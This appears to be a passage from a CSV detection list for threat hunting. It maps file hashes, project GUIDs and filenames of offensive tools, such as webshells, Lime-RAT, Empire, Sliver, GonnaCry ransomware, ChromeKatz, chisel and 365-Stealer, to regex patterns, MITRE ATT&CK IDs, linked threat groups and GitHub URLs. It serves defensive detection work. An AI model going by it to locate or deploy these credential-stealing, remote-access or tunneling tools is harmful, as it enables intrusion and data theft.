"*3629589a44e2c3b8d1bbc7ae8c779b0a7522755906e09d4bd14b76d6e168741c*",".{0,1000}3629589a44e2c3b8d1bbc7ae8c779b0a7522755906e09d4bd14b76d6e168741c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24580"
"*362a1076dc1f77532a07c12db0b3ce368eac2b15d1cfc8afa1a1a735ac25e430*",".{0,1000}362a1076dc1f77532a07c12db0b3ce368eac2b15d1cfc8afa1a1a735ac25e430.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24581"
"*362c03182899bbfcbd5502658dc569c82347a3eedccb7576a5e061a7a536171a*",".{0,1000}362c03182899bbfcbd5502658dc569c82347a3eedccb7576a5e061a7a536171a.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","24582"
"*36306a3cbeee8bd6405ac58a4800eec4adf403c3c3fb3d70bd7c73e8df17675f*",".{0,1000}36306a3cbeee8bd6405ac58a4800eec4adf403c3c3fb3d70bd7c73e8df17675f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24584"
"*3637cb58a5fae664a12943bbc979556d11b88b918bf8ab9ab78be4e9d9d3292a*",".{0,1000}3637cb58a5fae664a12943bbc979556d11b88b918bf8ab9ab78be4e9d9d3292a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24586"
"*363a083ee261a6b87743076d1f38062c4e23d0938817c63dea8716b694c78c7a*",".{0,1000}363a083ee261a6b87743076d1f38062c4e23d0938817c63dea8716b694c78c7a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24587"
"*363A6DE4-59D9-451B-A4FD-1FE763970E1E*",".{0,1000}363A6DE4\-59D9\-451B\-A4FD\-1FE763970E1E.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24588"
"*3644992e6ddad57730c25549175afaded580cd12226675105f71525e7d089d24*",".{0,1000}3644992e6ddad57730c25549175afaded580cd12226675105f71525e7d089d24.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","24590"
"*364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452*",".{0,1000}364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24591"
"*364fd5587812cb5f7f912683f4267573d12a78bb158d9e32272b09ececa7ec70*",".{0,1000}364fd5587812cb5f7f912683f4267573d12a78bb158d9e32272b09ececa7ec70.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24592"
"*3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4*",".{0,1000}3655a757ef5f8d849bb61132c30e20848cd88ce2233abf1ca71e029ec7572fc4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24593"
"*3655e26bfd9900a39da92af0cbd8ac57decf67a6f31680db406e8b534c6a94e4*",".{0,1000}3655e26bfd9900a39da92af0cbd8ac57decf67a6f31680db406e8b534c6a94e4.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","24594"
"*3658b250fc3dd383aa2a7cc2add77d00e005129ba54fdf5fdd20570ced68c72f*",".{0,1000}3658b250fc3dd383aa2a7cc2add77d00e005129ba54fdf5fdd20570ced68c72f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","24595"
"*365-Stealer.py*",".{0,1000}365\-Stealer\.py.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","24596"
"*365-Stealer-master*",".{0,1000}365\-Stealer\-master.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","24597"
"*366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6*",".{0,1000}366294485d6a2c872b0ebf033cb129a23ed2fce4ca2dc3e7905cb49a808ba7a6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24599"
"*36663e4535c25c63a9debb293737016321c3dec8425eca3fff69ba37a7603d63*",".{0,1000}36663e4535c25c63a9debb293737016321c3dec8425eca3fff69ba37a7603d63.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24600"
"*366dfaa9fb6cdd168c41aa608cd363c1953aa2126749000847b5a282835eb0a5*",".{0,1000}366dfaa9fb6cdd168c41aa608cd363c1953aa2126749000847b5a282835eb0a5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24601"
"*36855e25edfdc11367442a67a436dbb0cc79454dbf92435de3e6017f25378703*",".{0,1000}36855e25edfdc11367442a67a436dbb0cc79454dbf92435de3e6017f25378703.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24602"
"*3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c*",".{0,1000}3688991da39646b2fb375ce860fc34e29341598abb35e10ddc9f4650460a1f2c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24603"
"*36922dd433801687ef428a64f1db8195d4efa8112cd7629b283476bce58e1d30*",".{0,1000}36922dd433801687ef428a64f1db8195d4efa8112cd7629b283476bce58e1d30.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","24605"
"*3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c*",".{0,1000}3697e7b61d4f49ead950dfcc75560c457c836fcbc9f81b15b2041eb2a7a5171c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24608"
"*36980b0616d902fa05508052ae1ea0224a82b442e45d1756e71c0a911456712a*",".{0,1000}36980b0616d902fa05508052ae1ea0224a82b442e45d1756e71c0a911456712a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24609"
"*36a51b581592148e33c4f47c4e4f72710564595b6147b732e203d27a6d7dabb5*",".{0,1000}36a51b581592148e33c4f47c4e4f72710564595b6147b732e203d27a6d7dabb5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24612"
"*36a5fc4f46aea01f852923cd75f58793d9aa05abd8567ee8e0ab97c9270b6d1a*",".{0,1000}36a5fc4f46aea01f852923cd75f58793d9aa05abd8567ee8e0ab97c9270b6d1a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24613"
"*36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944*",".{0,1000}36a659bab7eec62733d13b9e7f8a6ae891cfaf7cd2ec36824bf41f7e6b706944.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","24614"
"*36a795ba9dfe58c4e8cac8b24ada8cbee9b598dc7af6ee076de0b09750aea29a*",".{0,1000}36a795ba9dfe58c4e8cac8b24ada8cbee9b598dc7af6ee076de0b09750aea29a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24616"
"*36a8df8ded4e69fc68c172aef01afc33ab8576b130987c5708b8dc58f714c4d2*",".{0,1000}36a8df8ded4e69fc68c172aef01afc33ab8576b130987c5708b8dc58f714c4d2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24617"
"*36AB45D2-F886-4803-AA7E-6FD5520458FC*",".{0,1000}36AB45D2\-F886\-4803\-AA7E\-6FD5520458FC.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","24618"
"*36afa4616649f78e31cf7b67a66fddd9e9d6c532a791aa37c8b64ab6819a2c1f*",".{0,1000}36afa4616649f78e31cf7b67a66fddd9e9d6c532a791aa37c8b64ab6819a2c1f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24619"
"*36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859*",".{0,1000}36b45b5ab3cbd980c5ca2c3bd229525e7dd937a0eb2e53347dfa2671cf27d859.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24620"
"*36b81baa1376efd694fc671e7ad2791b223d31762dc2bb32d919addaf5862f02*",".{0,1000}36b81baa1376efd694fc671e7ad2791b223d31762dc2bb32d919addaf5862f02.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24621"
"*36bab647467333a997dac89001fe066779c64dd73815523b956a44157b542bb1*",".{0,1000}36bab647467333a997dac89001fe066779c64dd73815523b956a44157b542bb1.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","24623"
"*36c21ec0ea2bbe57193e5f8354f4be046558921bc3231506f99700243ca18518*",".{0,1000}36c21ec0ea2bbe57193e5f8354f4be046558921bc3231506f99700243ca18518.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","24624"
"*36c3075114a8f3fe901eca2b4088929047e82a7d7e762b47fcacd7109eda0407*",".{0,1000}36c3075114a8f3fe901eca2b4088929047e82a7d7e762b47fcacd7109eda0407.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24625"
"*36c6235d0a635f47045fb9eb24715bee64d25024c3f33041deeb114efda6e99d*",".{0,1000}36c6235d0a635f47045fb9eb24715bee64d25024c3f33041deeb114efda6e99d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24626"
"*36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159*",".{0,1000}36c6bc3f7f5efd96f7bf472d30119cf22142383adaf774b96732b27ecefe9159.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24627"
"*36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875*",".{0,1000}36c88f1852f3c162bf64d973bb6f69ffb7e22503015e104716fc51eaddcbe875.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#filehash","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","24628"
"*36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231*",".{0,1000}36cbfc729051ef456ce4f71973619ce33c05ef4c3072a6cdf4e1ff555ab5a231.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24629"
"*36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15*",".{0,1000}36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24631"
"*36ddc7f64cb3df2ca4170627c6e0f0dea33d1a6d0730629dff6f5c633f2006f9*",".{0,1000}36ddc7f64cb3df2ca4170627c6e0f0dea33d1a6d0730629dff6f5c633f2006f9.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","24633"
"*36E00152-E073-4DA8-AA0C-375B6DD680C4*",".{0,1000}36E00152\-E073\-4DA8\-AA0C\-375B6DD680C4.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#GUIDproject","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","24634"
"*36e3d1cc09aff85da9b79e384efe1b8e1db705fa061ff85db3c1ff14e979862e*",".{0,1000}36e3d1cc09aff85da9b79e384efe1b8e1db705fa061ff85db3c1ff14e979862e.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","24635"
"*36e459305e1df9cc100dff6ecfc2ef7fd1ef63ad6e989c8c9802533b0f78b9e4*",".{0,1000}36e459305e1df9cc100dff6ecfc2ef7fd1ef63ad6e989c8c9802533b0f78b9e4.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24636"
"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*",".{0,1000}36EBF9AA\-2F37\-4F1D\-A2F1\-F2A45DEEAF21.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","#GUIDproject","N/A","N/A","10","1794","256","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z","24639"
"*36f3846afda7e148c57f944720df6f3de2085d7c49f9a207e1e8bdcda8bd82a4*",".{0,1000}36f3846afda7e148c57f944720df6f3de2085d7c49f9a207e1e8bdcda8bd82a4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24640"
"*36f41c33dbc19f8de5e440a192fcc41528838a5840bb21ccdbc390e28086c7cc*",".{0,1000}36f41c33dbc19f8de5e440a192fcc41528838a5840bb21ccdbc390e28086c7cc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24641"
